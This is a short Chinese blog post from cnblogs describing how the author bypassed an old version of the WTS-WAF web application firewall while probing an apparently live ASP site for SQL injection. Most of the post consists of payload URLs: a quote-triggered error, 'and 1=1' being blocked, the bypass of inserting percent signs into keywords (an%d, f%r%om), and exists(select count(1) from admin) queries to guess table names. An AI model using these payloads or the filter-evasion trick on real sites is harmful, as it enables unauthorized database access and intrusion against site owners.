老版本WTS-WAF bypass小记
起因
挖漏洞的时候总是会遇到WAF,绕过记录
漏洞点
***view.asp?big=75&Id=1 漏洞点在Id参数
添加单引号报错
来一波老套的Id=1 and 1=1 ,出现防火墙
***view.asp?big=75&Id=1%20and%201=1
bypass
老版本WTS-WAF绕过很简单,在关键字里面加%符号即可
***view.asp?big=75&Id=1%20an%d%201=1
成功绕过
猜表
猜表名,这个地方使用burpsuite暴力跑就行,也可以手动测一些比较常规的表名,例如admin
***view.asp?big=75&Id=1%20an%d%20exists(select%20count(1)%20f%r%om%20admin)
说明存在admin表,为了证明语句没错,再测一下manager表
***view.asp?big=75&Id=1%20an%d%20exists(select%20count(1)%20f%r%om%20manager)
说明注入语句没错,manager表不存在
点到为止
参考链接
- https://blog.csdn.net/u011781521/article/details/53942183
- https://zhuanlan.zhihu.com/p/27730232
- https://www.jianshu.com/p/b2da19279f1f
__EOF__
本文作者:春告鳥
本文链接:https://www.cnblogs.com/Cl0ud/p/14345881.html
关于博主:评论和私信会在第一时间回复。或者直接私信我。
版权声明:本博客所有文章除特别声明外,均采用 BY-NC-SA 许可协议。转载请注明出处!
声援博主:如果您觉得文章对您有帮助,可以点击文章右下角【推荐】一下。您的鼓励是博主的最大动力!
本文链接:https://www.cnblogs.com/Cl0ud/p/14345881.html
关于博主:评论和私信会在第一时间回复。或者直接私信我。
版权声明:本博客所有文章除特别声明外,均采用 BY-NC-SA 许可协议。转载请注明出处!
声援博主:如果您觉得文章对您有帮助,可以点击文章右下角【推荐】一下。您的鼓励是博主的最大动力!
【推荐】国内首个AI IDE,深度理解中文开发场景,立即下载体验Trae
【推荐】编程新体验,更懂你的AI,立即体验豆包MarsCode编程助手
【推荐】抖音旗下AI助手豆包,你的智能百科全书,全免费不限次数
【推荐】轻量又高性能的 SSH 工具 IShell:AI 加持,快人一步
· Linux系列:如何用heaptrack跟踪.NET程序的非托管内存泄露
· 开发者必知的日志记录最佳实践
· SQL Server 2025 AI相关能力初探
· Linux系列:如何用 C#调用 C方法造成内存泄露
· AI与.NET技术实操系列(二):开始使用ML.NET
· 被坑几百块钱后,我竟然真的恢复了删除的微信聊天记录!
· 没有Manus邀请码?试试免邀请码的MGX或者开源的OpenManus吧
· 【自荐】一款简洁、开源的在线白板工具 Drawnix
· 园子的第一款AI主题卫衣上架——"HELLO! HOW CAN I ASSIST YOU TODAY
· Docker 太简单,K8s 太复杂?w7panel 让容器管理更轻松!